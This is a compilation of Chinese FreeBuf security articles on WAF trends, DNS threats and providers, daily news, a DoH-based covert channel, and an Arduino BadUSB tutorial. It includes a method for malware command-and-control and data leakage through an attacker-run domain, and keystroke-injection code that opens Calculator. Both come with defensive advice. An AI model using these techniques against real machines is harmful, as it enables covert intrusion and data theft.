从目前的数据来看,拦截的攻击中,扫描器产生的请求数量在90%以上,除去扫描器自动化产生的攻击,剩下的10%手工测试行为,0day,广度低频等攻击则是需要花上90%精力来解决,如图3-1所示。

图3-1.jpg2. 利用编码绕过防护的行为愈发普遍

随着WAF对网站的防护越来越普及,针对基础web攻防来说,利用诸如MySQL、JavaScript语言特性进行各种编码、变形,从而绕过WAF防护的攻击payload也越来越多,攻防是一个持续对抗升级的过程。根据云上数据显示,当前已有近1/3的攻击数据采用了不同程度或类型的编码、变形手段,以期绕过云盾WAF的防护,其中甚至不乏使用多维度的复合变形、编码手段实施攻击。

云盾WAF新一代引擎架构,支持多种常见HTTP协议数据提交格式全解析:HTTP任意头、Form表单、Multipart、JSON、XML;支持常见编码类型的解码:URL编码、JavaScript Unicode编码、HEX编码、Html实体编码、Java序列化编码、base64编码、UTF-7编码;支持预处理机制:空格压缩、注释删减,向上层多种检测引擎提供更为精细、准确的数据源。

该架构主要特征包括:在准确性上,优化引擎解析HTTP协议能力,支持复杂格式数据环境下的检测能力;抽象复杂格式数据中用户可控部分,降低上层检测逻辑的复杂度,避免过多检测数据导致的误报,降低多倍的误报率;在全面性上,支持多种形式数据编码的自适应解码,避免利用各种编码形式的绕过。

3. IP身份不再可信

IP地址是传统防护中一个非常重要的手段,很多经典的防护手段,如限速、名单、异常行为识别、威胁情报等都是基于IP地址实现的。但随着现在黑灰产对大规模代理IP池,特别是秒拨IP的广泛使用,IP地址已经变得不再可信。同一个IP地址,在10分钟前还被合法用户小白用于浏览A网站,在10分钟后已经被黑产人员小黑用作撞库攻击的代理IP,一个IP背后的身份开始变得极其复杂,黑与白交接的灰色地带比例在迅速扩大,这对于很多传统安全方案(不论是黑名单机制还是白名单机制)都带来了颠覆性的威胁,带来的相应误报和漏报也在迅速增长。

相应的,防护一方也应该做出改变。我们建议在做安全防护方案时,一方面将IP的身份或信誉辅助以其他维度的情报信息或者二次校验手段综合判断;另一方面降低对于IP的依赖,从更多维度去标识一个“客户端”或者“用户”,如设备指纹、业务中打点的token、cookie等等。

获取完整版报告请点击链接:https://files.alicdn.com/tpsservice/3ae3996f0011b95f27a4d07f9804cf87.pdf?.pdf

*本文作者:阿里云安全,转载请注明来自FreeBuf.COM

本文所涉及的DoH加密传输信息的技术仅用于技术分享与讨论,严禁用于其他用途,所带来的法律风险与本文无关。

一、DoH(DNS-over-HTTPS)简介

DNS服务器就像一个在线的电话本,记录域名和IP地址的映射关系。当用户想要访问某个网站的时候,先向DNS服务器请求解析域名,得到网站服务器的IP,再与网站服务器进行通信,请求网页的内容,最终得以在浏览器呈现内容。但是DNS请求是没有加密的,请求的域名会以明文的方式传输。

为了有效防止用户上网时的中间人攻击(Man-in-Middle Attack, MIMT攻击),同时也更好地保护用户的隐私,HTTPS开始推行,即将用户的HTTP通信加密传输。于是由传统的DNS+HTTP变为DNS+HTTPS,这使得用户的HTTP通信变得安全,但是要注意到此时的DNS环节仍旧是明文传输,用户的上网行为(访问哪些域名)仍旧暴露在网络上。

于是,和HTTP通信类似,DNS请求环节也应该被加密以保护用户的隐私,即由DNS+HTTPS升级为DoH+HTTPS,这样用户的上网行为得到了全程的加密保护。目前已有多个服务提供商提供DoH服务,如Google(https://dns.google.com/resolve)、Quad9(https://dns.quad9.net/dns-query),firefox和Chrome浏览器也提供相应的设置或插件。

下图是通过浏览器普通访问www.baidu.com时产生的DNS流量,可以在数据包中明显看出用户请求的域名是www.baidu.com

图1普通DNS流量.jpg

下图是通过quad9提供的DoH服务解析www.baidu.com时产生的流量,此时已经无法看到用户的上网行为。

图2DoH流量.jpg

二、隐私不等于安全

研究人员发现,在2017年HTTPS流量已经在全球Web流量中占比超过50%,但恶意软件作者的采用率高于普通用户。通过加密保护数据安全中所指的100%安全,其实也为恶意软件提供了更强的隐蔽性,为监管带来新的压力。HTTPS如此,DoH亦然。

下面提出一种基于DoH实现的隐蔽通信,恶意流量可以由加密保护“安全”送达不法分子的DNS服务器,并通过请求DNS TXT记录获得不法分子预留在DNS服务器中的信息。

TXT记录是在DNS服务器上为某域名记录配置说明的一种方法,当请求域名的TXT记录时DNS服务器会返回对应字符串。

假设不法分子申请了域名fengrou2019.club,并配置了解析该域名及其子域名的DNS服务器(以下简称被控DNS服务器),在被控DNS服务器的域名映射表内添加www.fengrou2019.club的TXT记录为“helloword”作为不法分子预留给恶意软件的信息。

图3DoH通信结构图.png

在受控DNS服务器上,设置本地未命中请求的转发表,将本地无法解析的请求转发给权威DNS服务器,本例中配置Google DNS(ip:8.8s.8.8)。于是,该DNS服务器可以实现正常DNS服务器的功能,解析请求的域名。

图4DNS转发表.png

在本地解析文件中配置www.fengrou2019.club的TXT记录“helloword”。

图5TXT记录创建.png

1 恶意软件获取TXT记录信息

恶意软件通过HTTPS通信向提供DoH服务的权威DNS服务器请求www.fengrou2019.club的TXT记录,拿到了控制者预留的“helloword”。

图6获取TXT记录.jpg

通过抓包检测流量情况,可以看见被TLS加密的信息交互。

图7流量被加密.jpg

2 恶意软件通过DNS请求在受控DNS服务器留下信息

假设恶意软件想向控制者发送“helloword”,则可以通过DoH解析“helloword.fengrou2019.club”来传递信息。由于DNS请求通过HTTPS发送,所以请求的域名不会被旁路知晓,但是受控DNS在响应请求时处理的是明文信息,所以控制者可以在受控DNS看到“helloword”。

①恶意软件请求解析“helloword.fengrou2019.club”。

图8向DNS服务器发送helloword.png

②恶意软件的网络中无法知晓恶意软件的具体网络行为,捕获的流量与先前解析www.fengrou2019.club时一样,是被加密保护的。

图9传递的信息被加密.png

③在受控主机可以看到明文的helloword.fengrou2019.club请求。

图10DNS服务器获取helloword.png

三、防御建议

技术是一把双刃剑,在保护用户私人数据隐私的技术不断发展的同时,也为不法分子提供了便利,给监控带来了新的挑战。

现有的监控工具常布置在网络边缘;此外,有的浏览器提供恶意域名检测,可以向用户告警或直接拦截访问请求;DNS服务器也部署有黑名单,不支持对黑名单内域名的解析请求。

对于本文所述的信息泄露方式,可以考虑在应用层监测域名请求,应用层位于TLS之上,在应用层可捕获到请求域名的明文字符串,对于不正常的域名,如长度过长,信息熵异常等域名,应予以拦截和告警;DNS服务提供商亦应当部署相应黑名单或恶意域名检测技术;对于自身不使用DoH技术进行网络活动的用户,可以在防火墙设置拦截自身不使用且支持DoH技术的DNS服务器。

*本文作者: BUPT/AG9GgG,ArkTeam/XHJ,转载请注明来自FreeBuf.COM

dns_browser_http_web_internet_thinkstock-100758191-large.jpg

DNS攻击正在逐渐加剧,您的域名系统(Domain Name System,简称DNS)实施是否真的符合要求?以下是您需要了解的信息,以确保拥有符合自身要求的提供商。

什么是DNS攻击?

所谓“域名系统”(DNS)就是一种将字母域名解释为IP地址的协议。简而言之,它的主要功能是将用户友好的域名转换为计算机友好的IP地址。

即使已经使用了数十年,域名系统(DNS)仍然是互联网的致命弱点。这是因为互联网上几乎所有东西都需要DNS,但DNS服务依赖的协议既不可靠又容易被冒充。出于这两个原因,攻击者将DNS定位为直接攻击或支持其他攻击的跳板。

如今,DNS更是显示出了一种异常紧张的迹象。过去,利用DNS协议的攻击是相当可预测的,且仅限于偶尔的DDoS洪水攻击,但是现在,攻击者可以使用十几种不同的方式来利用DNS,常见的DNS攻击包括:

1)域名劫持——通过采用黑客手段控制域名管理密码和域名管理邮箱,然后将该域名的NS纪录指向到黑客可以控制的DNS服务器,然后通过在该DNS服务器上添加相应域名纪录,从而使网民访问该域名时,进入了黑客所指向的内容。

2)缓存投毒——利用控制DNS缓存服务器,把原本准备访问某网站的用户在不知不觉中带到黑客指向的其他网站上。其实现方式有多种,比如可以通过利用网民ISP端的DNS缓存服务器的漏洞进行攻击或控制,从而改变该ISP内的用户访问域名的响应结果;或者,黑客通过利用用户权威域名服务器上的漏洞,如当用户权威域名服务器同时可以被当作缓存服务器使用,黑客可以实现缓存投毒,将错误的域名纪录存入缓存中,从而使所有使用该缓存服务器的用户得到错误的DNS解析结果。

3)DDOS攻击——一种攻击针对DNS服务器软件本身,通常利用BIND软件程序中的漏洞,导致DNS服务器崩溃或拒绝服务;另一种攻击的目标不是DNS服务器,而是利用DNS服务器作为中间的“攻击放大器”,去攻击其它互联网上的主机,导致被攻击主机拒绝服务。

4)DNS欺骗——就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。

5)DNS放大攻击(DNS amplification attacks)——使用针对无辜的第三方的欺骗性的数据包来放大通讯量,其目的是耗尽受害者的全部带宽。这种虚假通讯的数量可以达到每秒钟数GB,足以阻止任何人进入互联网。

6)零日攻击——在此类攻击中,攻击者利用DNS服务器软件或协议堆栈中以前未知的漏洞。

7)Fast Flux技术——在正常的DNS服务器中,用户对同一个域名做DNS查询,在较长的一段时间内,无论查询多少次返回的结果基本保持不变。Fast-flux技术是指不断改变域名和IP地址映射关系的一种技术,攻击者可以将多个IP地址的集合链接到某个特定的域名,并将新的地址从DNS记录中换入换出,回避检测。也就是说在短时间内查询使用Fast-flux技术部署的域名,会得到不同的结果,即Fast Flux技术利用DNS隐藏攻击的来源。

根据IDC最新发布的《2019年全球DNS威胁报告》显示,绝大多数受访者在过去两年中都遭遇了与DNS相关的攻击。平均每家公司上报的攻击次数多达近10起,影响了近一半的受访者网站。

DNS先驱Paul Vixie对DNS的状态感到惋惜,并表示这些攻击还只是冰山一角而已。这也解释了为什么您需要更加认真地保护自己的DNS基础架构,并且各个供应商都相继推出各种产品和服务来提供帮助。但是面对这些供应商,你有选择的权力,具体应该如何做呢?

利用您的ISP提供商的DNS

第一步是使用您的ISP提供的DNS。对于我们许多人来说,这已经成为一种习惯动作。不过,虽然这是阻力最小的路径,但是你可能无法获得太多保护、过滤或威胁监控服务。

使用支持DNSSEC的公共DNS提供商

更好的选择是将ISP提供的DNS替换为支持域名系统安全扩展(DNSSEC)的公共DNS提供商之一。所谓DNNSSEC是用于确定源域名可靠性的数字签名,通过添加DNSSEC记录到域名,可以增强对DNS域名服务器的身份认证,进而帮助防止DNS缓存污染等攻击。不过有了DNSSEC支持固然很好,但是也无法保证您不会受到潜在的攻击。早在2016年,攻击者就想出了将该协议用于DDoS放大攻击的方法。

除DNSSEC外,公共提供商还要为其DNS服务器位置提供易于记忆的IP地址,如1.1.1.1(Cloudflare),8.8.8.8(Google)或9.9.9.9(Quad9)。这些服务对于小型企业以及经常出差并希望为其笔记本电脑提供额外安全层的用户非常有用。下述供应商就提供支持DNSSEC或类似协议的免费DNS服务:

· AdGuard DNS(过滤、DNS加密、基于HTTPS和TLS的DNS);

· Alternate DNS(过滤和广告拦截);

· CleanBrowsing(过滤、DNS加密、基于HTTPS和TLS的DNS,另有付费管理项目);

· Cloudflare(基于HTTP的DNS);

· Google Public DNS(基于HTTPS和TLS的DNS);

· Cisco OpenDNS(过滤,另有付费管理项目);

· Quad9(过滤、DNS加密、基于HTTPS和TLS的DNS);

· Verisign(另有付费项目);

审查您的云提供商提供的DNS产品

对于具有一定规模的企业网络而言,接下来的一步就是审查您的云提供商所提供的基本功能。Google有其Cloud DNS,亚马逊有AWS Route 53,而微软也有Azure DNS。这些服务都可以免费试用,但也具有非常复杂的定价方案,可以基于企业对其云服务器的具体查询量确定详细的定价方案。云提供商确实带来了更多安全性,但是如果您想在整个企业中使用单个DNS源,可能就不合适了。

考虑DNS专业提供商

下一步就是考虑一家专业的DNS提供商,如此一来,您将获得比IaaS(基础设施即服务)提供商的内置选项更多的安全保护。这些专业的DNS提供商将提供更高的弹性,因为他们在全球拥有众多DNS服务器位置。此外,通过减少流量包流经网络时的延迟时间,它还能为用户提供更好的性能。鉴于其拥有的巨大流量,专业DNS提供商还可以提供更好地攻击监控和防御能力,以便更为及时地发现并阻止漏洞。

如今,4个最受欢迎的专业DNS提供商及产品分别为:

· Akamai的Enterprise Threat Protector(ETP)——是一款安全互联网网关 (SIG),可支持安全团队确保用户和设备在任何位置都能安全地连接到互联网,而不存在其他传统安全解决方案固有的复杂性。它能够主动识别、拦截和抵御恶意软件、勒索软件、网络钓鱼、数据外泄和高级零日攻击等定向威胁。

· NS1 Domain Security Suite——是DNS服务和功能的转键软件包,旨在保护您的企业和客户免受DNS漏洞利用的侵害。它使用专用DNS实现双DNS网络冗余,使用DNSSEC防止DNS劫持,同时还能提供情报、可见性和控制功能,帮助您的团队及时了解DNS使用情况,从而深入了解外部行为者可能滥用的情况。

· OpenDNS(2015年被Cisco收购)/Cisco Umbrella——原OpenDNS旗下拥有的一款云计算产品,可以帮助企业客户免遭恶意软件、钓鱼软件、僵尸工具以及其它有针对性网络黑客行为的攻击。

· Cloudflare——2018年4月,Cloudflare正式推出了1.1.1.1公共DNS服务,号称任何人都可以使用它来加快互联网访问速度并保持连接私密性。Cloudflare声称它将是“互联网上速度最快,隐私优先的消费者DNS服务”。

如果您已经使用过Akamai或Cloudflare的内容分发网络,那么您可能正在使用他们的DNS工具。即使你还没有或是永远不打算用他们的内容网络,了解其中一个产品也是有意义的。

如何评估您的DNS提供商?

1. 了解您的网络瓶颈和DNS问题

首先,你需要了解自己的网络瓶颈在什么地方,以及你需要解决的DNS问题(如果有的话)是什么。对于这些问题,一些免费或廉价的工具和在线服务可以提供帮助。例如,DNSPerf可以通过每分钟从全球200个地点测试每个提供商,向你显示上个月的各种指标。Cloudflare的查询可以在不到12毫秒内得到解答;而GoDaddy的查询则超过47毫秒。DNSBlast等工具可以加载测试您当前的DNS服务器;DNSBenchmark可以在Windows上进行性能测试。

一旦掌握了所有这些数据,你就可以更好地了解自己的流量是如何从选定的DNS提供商处流向最终的网站访问者和其他互联网应用程序的了。如果你的所有客户都在美国,那么你可能已被任何供应商所覆盖。有些供应商在全球范围内拥有更多资源,如果你在这些地点拥有大量流量,这些资源就会派上用场。你应该要了解提供商的DNS服务器位于世界的哪个物理位置上。(一些供应商会羞于回答这个问题)

如果您有一个遍布众多地区的特别复杂的网络,您可能需要借助Dyn的Internet Intelligence工具。(这是已经销售给Oracle的Dyn工具之一,但仍受支持)

2. 审查DNS管理仪表板

接下来,你需要检查供应商的管理仪表板,看看你是否能够了解它传递给你的信息,展示的可操作数据以及供应商所监控的内容。下面都是需要了解的一些关键问题:

· 你是否近乎实时地看到异常流量?

· 你是否能够添加“地理围栏”(geofencing )规则,以防止大规模网络钓鱼攻击?所谓“地理围栏”(Geo-fencing)即LBS(基于位置的服务)的一种应用,就是用一个虚拟的栅栏围出一个虚拟地理边界,当手机进入、离开某个特定地理区域,或在该区域内活动时,手机可以接收自动通知和警告。

· 你是否看到哪些位置(包括你和他们的位置)正在经历中断或减速现象?

· 是否有可以与您的云或SaaS提供商合作的API将它们集成到您的DNS覆盖范围中?

· 是否有可用的负载平衡或其他流量优化工具?

3. 将自身需求与供应商的产品相匹配

你需要将自身需求与提供商所提供的内容相匹配。例如,思科的Umbrella有四种不同的捆绑产品。最昂贵的“platform”系列是唯一一个提供威胁执行的系列,但如果你并不需要这项功能,你就可以选择其他价格更为低廉且功能较为齐全的替代品。

4. 获得准确的报价

最后,你需要一份报价。除非你已经掌握整体网络流量或你需要保护的用户或端点数量,否则是很难估算费用的。当然,需要了解的是,没有供应商会提供完全透明的费用,而是需要根据客户的具体使用情况进行定价。

FreeBuf早报,安全圈值得关注的每日大事件

【全球动态】

1、火绒安全:灰色产业链成病毒传播最大渠道 流量生意或迎来最后的疯狂【阅读原文

近期,“火绒威胁情报系统”监测到,病毒团伙为了获取更多的利润,开始与广告推广平台“合作”暗刷流量,以此欺骗用户和广告主、对抗安全厂商。这种病毒和广告联盟协同暗刷坑害广告主的行为、这种近乎癫狂的传播模式,似乎在宣告“流量生意”的彻底黑化。

2、苹果再发静默更新 删除其他存在Zoom漏洞软件的Web服务器【阅读原文

昨天苹果向The Verge在内的多家媒体发出通知,表示已经向Mac设备发送静默安全更新,以删除RingCentral和Zhumu自动安装的软件。这些视频会议应用程序都使用了Zoom的技术,由于它们本质上都是白标签,因此它们同样存在Zoom的安全漏洞。

3、网购假病历在多个众筹平台诈捐 男子涉诈骗罪被公诉【阅读原文

唐某某多次利用网上购买的虚假病历,在“轻松筹”“水滴筹”等众筹平台发布个人求助信息及网络筹款,共获得网友帮助429次,骗取捐款7404元(其中1022元未遂)。近日,新疆维吾尔自治区乌鲁木齐市达坂城区检察院以涉嫌诈骗罪对唐某某提起公诉。

4、五角大楼希望加强网络安全队伍 为2020美国总统大选护航【阅读原文

周二的时候,国防部长提名人 Mark Esper 向参与元军事委员会表示,尽管仍有许多工作要完成,但其对于 2020 总统大选期间的网络安全充满信心:“我们坚信 2020 年的总统大选不会再受到影响,但鉴于总会有人来干扰,我们仍有许多工作要继续”。上个月的时候,一名高级情报官员在某次简报中向记者透露,2020 总统大选仍是该国网络安全的首要维护目标。

5、微信打击违规贷款、仿冒公众号等行为 累积处罚3万多个公众号【阅读原文

微信官方发文称,最近对于违规贷款服务、打卡欺诈、仿冒公众号等行为开展了专项处理,针对平台的一些其他违规行为,如违规小程序第三方服务商等,将采取多种法律途径进行处理。

6、Android 应用开发者有意推迟升级以收集更多用户数据【阅读原文

2015 年 10 月释出的 Android 6.0 引入了新的权限管理,用户能管理每个应用的权限,可以选择给予或拒绝特定权限。Android 应用开发者允许在三年时间里升级支持 Android 6.0 SDK,他们不需要立即支持,但他们会选择何时升级支持 Android 6.0 SDK 呢?

【安全事件】

1、继联想之后,技嘉旗下产品也受到固件漏洞影响【外刊-阅读原文

受影响的产品使用名为MergePoint EMS的固件,由Avocent制造和提供,Avocent是一家软件供应商,现在是数据中心设备和服务提供商Vertiv的全资子公司。技嘉和联想都将MergePoint EMS组件用于一些服务器主板附带的基板管理控制器(BMC)固件。

2、Drupal修复可让攻击者接管网站的关键漏洞【外刊-阅读原文

Drupal CMS团队发布了一个安全更新,以解决CMS核心组件中的严重访问绕过漏洞,该漏洞可能允许攻击者控制受影响的站点。根据安全通告,该漏洞仅影响Drupal 8.7.4、8.7.3、8.6.x以及Drupal 7。

3、贷款应用可暴露数百万国人的位置【外刊-阅读原文

数据库、个人身份信息(PII)以及数百万中国用户的实时位置被阿里云基础设施托管的开放式弹性集群泄露。在申请贷款时,国人使用的100多个移动贷款相关应用程序将高度敏感的信息添加到可公开访问的数据库中。根据国外研究机构的报告,最初发现数据泄漏的研究员这些服务器的所有者并不知情,后来阿里云才下架了这些数据库。

4、Google Play上的监视应用已被安装13万次【外刊-阅读原文

昨天,Avast的研究人员向谷歌报告了四个被认为是俄罗斯开发者上传的监视应用,谷歌即可对其进行下架操作。这些应用允许用户监视某个人,且不会在设备上留下痕迹,此类应用通常用于秘密监控员工的生活。

5、微软前员工被控窃取公司价值1000万美元数字货币【阅读原文

微软一名被开除的员工周二被美国当局逮捕,他被控利用在微软工作之便窃取了该公司价值1000万美元的数字货币。西雅图检察长办公室表示,这位名叫Volodymyr Kvashuk的25岁乌克兰公民曾帮助测试微软的在线零售平台。

【优质文章】

1、MITER ATT &CK框架也适合中小型企业使用【外刊-阅读原文

ATT&CK框架原来是黑客用来攻击和破坏计算机运行的工具和技术数据库。Splunk首席安全策略师Ryan Kovar表示,他已经看到世界各地的公司在其安全工作中使用ATT&CK,满足多种安全测试需要。

2、网络流量分析(NTA)解决方案市场规模将于2026年达到53亿美元【阅读原文

不久前,Transparency Market Research针对2018-2026年内的全球网络流量分析市场进行了调研和展望,并发布了相关报告。报告指出,2017年,全球范围内的网络流量分析解决方案具有非常大的市场潜力,整体价值约为15亿美元左右,根据推测,在接下来直到2026年,其每年的增长率将高达15.2%,也就是说到2026年左右,其市场规模将接近53亿美元左右。

3、借助树莓派上演“窃听风云”【阅读原文

在N年前看《窃听风云》时,里面的窃听环节就深深吸引着我,让我记忆深刻。在N年前对于普通的我们想要实现远程窃听技术需要购买昂贵的设备才能实现。但最近科技发展飞速,一般家庭宽带的网速已经达到了100M,同时手机的4G已经普及,5G也开始商用了,在这样的环境下实现电影里面的窃听技术就比较容易得多了。下面请随我一起开始窃听之旅。

*本文内容收集自全球范围内的媒体与刊物,制作者对其完整性负责,但不对其真实性和有效性负责。

*标注为【外刊】的内容主要来源为英语国家的媒体与刊物,部分内容需要注册免费账号后方可阅读。

前言

随着攻防演习行动暂时告一段落,回想起攻防演习中的神操作,如从树莓派+8187L网卡魔改无人机及带着味道的钻下水道操作,再到入职到防守方内网部署后门以及发布的防护文章里搞远控后门工具的种种碟中碟中碟中碟中谍的操作,当然也少不了本次行动中攻击方人员在各个目标附近广撒BadUSB试图使用物理手段拿下目标…… -w590

0X00 原理及基础知识

简介

吾旧友,拾U盘,彼异之,插PC,遂上线。

 这个(愚蠢)精彩故事不禁让我萌生学习制作一个BadUSB的想法,为了贴合实际,特地从某宝入手了一个arduino leonardo板,如下图所示。

image.png

简单来说,通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。

基础知识

HID攻击

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。

Teensy

攻击者在定制攻击设备时,会向USB设备中置入一个攻击芯片,此攻击芯片是一个非常小而且功能完整的单片机开发系统,它的名字叫TEENSY。通过TEENSY你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器与存储空间和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。 关于TEENSY,可以参考天融信阿尔法实验室的《HID攻击之TEENSY实战》

Arduino

Arduino是一款便捷灵活、方便上手的开源电子原型平台。 它构建于开放原始码simple I/O介面版,并且具有使用类似Java、C语言的Processing/Wiring开发环境。主要包含两个主要的部分:硬件部分是可以用来做电路连接的Arduino电路板;另外一个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了。

操作流程

BadUsb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。

Arduino

Arduino的特点

跨平台

Arduino 编程平台可以运行在Windows、Mac OS X、Linux、Android、iOS等各种操作系统上。而其它的大多数控制器一般只能在Windows上进行开发

编程灵活性

经过世界各国创客们的努力,Arduino编程平台已经可以脱离PC机上的传统编程。开发出来了一套更简单实用的图形化编程软件,让Arduino编程学习门槛进一步降低。让技术小白们能更快地创作出自己的智能作品。

开放性

Arduino的硬件原理图、电路图、IDE等软件和核心库都是开源的,开发人员可以在开源协议的范围内任意修改原始设计及相应的代码。

发展迅速

Arduino不仅仅是全球最流行的开源硬件,也是一个优秀的硬件开发平台,更是硬件发展的趋势。Arduino简单的开发方式使得开发者更关注创意与实现,更快的完成自己的项目开发,大大节约了学习的成本,缩短了开发的周期。

Arduino板子种类

Arduino先后发布了十多个型号的板子,有最基础的型号UNO,有小尺寸的micro,还有引脚数量更多的MEGA板。image.png

Arduino UNOimage.png

Arduino Leonardoimage.png

Arduino MICRO

image.pngArduino MEGA 2560

以上为Arduino板子介绍,下面进入正题。

0X01 安装驱动及连接arduino IDE

linux、Mac OS不需要安装驱动,但是Win7需要安装驱动,在win7系统中插入Arduino Leonardo 会显示下图黄色感叹号,安装驱动在arduino IDE 目录下的drivers中。

image.png

arduino IDE官网下载可能会稍慢些,我把IDE放到网盘里,链接如下所示,需要请自取,解压即可使用。

https://pan.baidu.com/s/1UqLszoiN8OI_vM3QYMlgIA 密码:8aspimage.png

0X02 案例操作

将硬件插入电脑后打开arduino IDE,以下为IDE启动界面image.png

arduino IDE工具栏->开发板->选择“Arduino Leonardo”image.png

arduino IDE工具栏->端口->选择“COMX(Arduino Leonardo)”image.png

弹计算器案例   从第一个程序来看,不难发现Arduino的程序结构与传统的c程序结构有所不同——Arduino程序中没有main函数。其实并不是Arduino程序中没有main函数,而是main函数的定义隐藏在了Arduino的核心库文件中。在进行Arduino开发中不直接操作main函数,而是使用setup和loop这两个函数。

setup()    Arduino控制器通电或者复位后,就会开始执行Arduino的初始化配置(IO口 串口等);

loop()    setup函数执行完毕后,Arduino会接着执行loop()函数中的程序。而loop函数是一个死循环,其中的程序会不断地重复运行。通常在loop函数中完成程序的主要功能,如驱动各种模块和采集数据等。

image.png

弹计算器代码:

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CALC");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}

void loop()//循环
{
}

注:Upload代码过程中会遇到反复断开问题,原因在Leonardo中被设定为在上传时,软件建立连接让控制器复位,从而免去了我们手动按下复位按钮的操纵。

arduino 弹出计算器:

image.png

再比如说弹个窗:image.png

以及从远程服务端下载恶意文件等等。image.png

这篇文章更多的是让自己对Arduino Leonardo有一个初步的认识,方便以后(还不是因为vps被ban了)更深入的去研究,许多后阶段的利用可以参考各位前辈优秀的文章,例如维克斯大佬的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma大佬的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo大佬的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获取文件的详细步骤及各种payload免杀,针对内网设备等等~~

0X03 BadUsb防御

大家可能发现,我(主要是穷)所使用BadUSB的只适合win10,只有win10能运行。WIN7都是提示安装驱动,针对性的参考国外大牛文章,主要是为了(主要是为了增加文章字数篇幅)学习一下如何针对BadUsb进行防御。How to Fix the Critical BadUSB Security Flaw in Less than 10 Minutes

创建黑名单

1、“ 开始” – > “运行”,然后键入gpedit.msc 以访问“ 本地组策略编辑器”。

2、访问以下内容:计算机配置 > 管理模板 > 系统 > 设备安装 > 设备安装限制image.png

3、双击 使用与这些设备设置类匹配的驱动程序阻止设备安装,然后选择启用。image.png

4、在同一位置,单击“ 显示”以通过其GUID创建USB设备的黑名单。image.png下列表格为常见的几个GUID及对应设备:

4d36e96b-E325-11CE-BFC1-08402BE10318 此控制器控制USB键盘的自动安装。
4D36E972-E325-11CE-BFC1-08012BE10318 此对应于NIC(网络接口控制器)
e0cbf06c-cd8b-4647-bb8a-263b45f0f974 这个用于蓝牙。

如想查阅GUID号码的更多信息,请参考GUID号码快速查阅

避免自动USB安装

为保护系统免受BadUSB漏洞影响的另一个方法是禁用自动安装新USB设备,依旧同上面一样的位置。

1、“ 开始” – > “运行”,然后键入gpedit.msc 以访问“ 本地组策略编辑器”。

2、访问以下内容:计算机配置 > 管理模板 > 系统 > 设备安装 > 设备安装限制image.png

1. 双击“ 禁止安装可移动设备”并启用它。

image.png

2. 双击“ 允许管理员覆盖设备安装限制”策略 并启用它。

image.png

禁用非活动USB端口

当然少不了一个比较(骚)硬的策略,那就是禁用那些不活跃的USB端口,从物理上进行隔绝,解决大部分BadUsb问题。

0X04 结束语

还是如同之前所示,这篇文章更多的是让自己对Arduino Leonardo有一个初步的认识及为了以后更深入的去学习,初识 Arduino Leonardo,望各位大佬斧正。

0X05 参考及感谢

https://www.jianshu.com/p/38cc68ff44ab

https://www.cnblogs.com/danpianjicainiao/p/11048576.html#_label1

https://heimdalsecurity.com/blog/badusb-exploit-vulnerability-fix/

https://blog.csdn.net/cd_xuyue/article/details/50500579

*本文作者:Parad0x,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。